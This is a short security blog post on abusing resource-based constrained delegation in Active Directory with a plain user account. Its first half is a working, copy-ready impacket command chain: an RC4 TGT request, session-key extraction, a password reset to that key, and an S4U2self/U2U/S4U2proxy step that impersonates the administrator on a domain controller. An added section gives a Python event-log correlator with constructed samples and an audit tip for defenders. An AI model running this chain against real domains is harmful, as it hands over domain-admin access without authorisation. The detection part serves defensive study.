SPN-less RBCD

05.06.2024 · dadevel

Abuse RBCD without a computer account.

Requirement: RBCD is already configured on the victim computer so that it trusts your sacrificial user (a plain domain user account, no SPN needed).

Get a RC4 TGT for your user.

impacket-gettgt -hashes :$(pypykatz crypto nt 'passw0rd') corp.local/jdoe

Extract the session key.

impacket-describeticket ./jdoe.ccache | grep 'Ticket Session Key'

Set the session key as new password.

impacket-smbpasswd -newhashes :$sessionkey corp.local/jdoe:'passw0rd'@dc01.corp.local

Impersonate a privileged account via S4U2self + U2U + S4U2proxy. This works because the user's long-term RC4 key now equals the TGT session key, so the S4U2self ticket obtained through U2U (encrypted with the session key) is accepted by the KDC during S4U2proxy as if it had been encrypted with the user's own key.

export KRB5CCNAME=$PWD/jdoe.ccache
impacket-getst -k -no-pass -u2u -impersonate administrator -spn cifs/dc01.corp.local corp.local/jdoe

Reset the password of the sacrificial user if the password policy permits reuse of old passwords.

impacket-smbpasswd -hashes :$sessionkey -newhashes :$(pypykatz crypto nt 'passw0rd') corp.local/jdoe@dc01.corp.local

Otherwise force-change the user's password as domain admin.
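From the defender's side, the sequence above leaves a recognisable trail in the domain controller's Security log: an RC4 TGT request (4768 with encryption type 0x17) for a user, a password change or reset of that same user shortly afterwards (4723/4724), and then service-ticket requests (4769) in which that plain user shows up as the delegating service (as ServiceName for S4U2self, or in TransitedServices for S4U2proxy). The correlator below is an added example, not part of the original post or of impacket; the event IDs and field names are the standard Windows Security audit ones, the 30-minute window is an assumption, and the sample events are constructed.

```python
"""Heuristic correlation of the SPN-less RBCD chain in Windows Security events.

Added example (not from the original post). Event IDs 4768/4723/4724/4769 and
the EventData field names are the standard Windows Security audit ones; the
events below are constructed samples, not real logs.
"""
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                  # TicketEncryptionType for RC4-HMAC
PASSWORD_CHANGE_IDS = {4723, 4724}  # 4723 = own password changed, 4724 = reset by another principal

# Constructed sample events normalised to dicts (the malicious chain plus benign noise).
SAMPLE_EVENTS = [
    {"time": "2024-06-05T10:00:00", "id": 4768, "TargetUserName": "jdoe",
     "TicketEncryptionType": "0x17"},
    {"time": "2024-06-05T10:01:30", "id": 4723, "TargetUserName": "jdoe",
     "SubjectUserName": "jdoe"},
    # S4U2self: the plain user is the "service" being asked for a ticket to itself
    {"time": "2024-06-05T10:02:10", "id": 4769, "TargetUserName": "administrator@CORP.LOCAL",
     "ServiceName": "jdoe", "TransitedServices": "", "TicketEncryptionType": "0x17"},
    # S4U2proxy: the plain user appears as the intermediate in TransitedServices
    {"time": "2024-06-05T10:02:12", "id": 4769, "TargetUserName": "administrator@CORP.LOCAL",
     "ServiceName": "DC01$", "TransitedServices": "jdoe@CORP.LOCAL", "TicketEncryptionType": "0x12"},
    # Benign: AES TGT followed by a routine password change
    {"time": "2024-06-05T10:05:00", "id": 4768, "TargetUserName": "asmith",
     "TicketEncryptionType": "0x12"},
    {"time": "2024-06-05T10:06:00", "id": 4723, "TargetUserName": "asmith",
     "SubjectUserName": "asmith"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def _account(name):
    """Normalise 'jdoe@CORP.LOCAL' / 'JDOE' to 'jdoe'."""
    return name.split("@")[0].lower()


def detect(events, window=timedelta(minutes=30)):
    """Return accounts showing RC4 TGT -> password change -> delegation use within the window."""
    flagged = []
    state = {}  # account -> {"stage": ..., "since": datetime}
    for ev in sorted(events, key=_ts):
        t, eid = _ts(ev), ev["id"]
        if eid == 4768 and ev.get("TicketEncryptionType") == RC4_HMAC:
            # Stage 1: RC4 TGT obtained (required so the session key fits an NT hash)
            state[_account(ev["TargetUserName"])] = {"stage": "rc4_tgt", "since": t}
        elif eid in PASSWORD_CHANGE_IDS:
            # Stage 2: the same account's password changed shortly after
            s = state.get(_account(ev["TargetUserName"]))
            if s and s["stage"] == "rc4_tgt" and t - s["since"] <= window:
                s["stage"] = "pw_changed"
        elif eid == 4769:
            # Stage 3: the account acts as a delegating service (S4U2self or S4U2proxy)
            candidates = {_account(ev.get("ServiceName", ""))}
            candidates |= {_account(x) for x in ev.get("TransitedServices", "").split(",") if x}
            for acct in candidates:
                s = state.get(acct)
                if s and s["stage"] == "pw_changed" and t - s["since"] <= window \
                        and acct not in flagged:
                    flagged.append(acct)
    return flagged


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

RC4 TGT requests or password changes on their own are routine in many domains; the value is in the ordering, and in the fact that an ordinary user account with no SPN normally never appears as ServiceName or in TransitedServices at all. The matching preventive check is to audit which principals hold entries in msDS-AllowedToActOnBehalfOfOtherIdentity on computer objects and treat any non-computer principal there as a finding.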

References: